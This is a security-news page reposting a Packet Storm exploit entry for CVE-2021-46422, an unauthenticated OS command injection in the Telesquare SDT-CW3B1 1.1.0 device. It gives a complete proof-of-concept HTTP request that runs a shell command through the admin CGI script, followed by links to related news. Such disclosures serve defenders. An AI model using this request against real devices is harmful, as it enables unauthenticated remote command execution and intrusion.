Security
Headlines
HeadlinesLatestCVEs

Headline

SDT-CW3B1 1.1.0 Command Injection

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

Packet Storm
#vulnerability#web#windows#apple#auth#chrome#webkit
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

Related news

Telesquare SDT-CW3B1 1.1.0 Command Injection

Telesquare SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

CVE-2021-46422: SDT-CW3B1 – Google Disk

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution